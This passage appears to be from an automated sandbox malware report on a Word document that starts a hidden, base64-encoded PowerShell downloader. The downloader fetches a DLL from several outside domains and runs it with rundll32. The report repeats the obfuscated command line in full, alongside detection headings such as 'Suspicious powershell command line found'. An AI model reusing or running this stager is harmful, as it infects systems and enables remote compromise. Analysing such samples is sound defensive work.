ZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0A

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100037FB push ecx; ret	7_2_1000380E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004134 push ecx; ret	7_2_10004146
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100037FB push ecx; ret	8_2_1000380E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004134 push ecx; ret	8_2_10004146

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Xts_nmf\P4188qk\U95D.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vobicwh\otzfel.hzn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Uxgydceommtwiki\qzhrxsieatmrnj.xlc:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bdzitbg\obtbak.jsi:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xewbyzlpihpnskgh\wwdzuofqhkcpmfa.gyu:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qakdocqxk\cjwfvfif.ylv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hutifyziasbygiy\qhmiqrfpmiryum.ywy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Tsbimf\rxvqt.dyw:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Zqkhe\wtjq.kha:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Rimdqgeexmnm\pcwmnbkufem.jtj:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xoteg\llch.amx:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vaxphioewmusne\ukdxjhhssdymm.ubj:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Widpnptibmnvlc\vizfdwjpjtiec.yqj:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
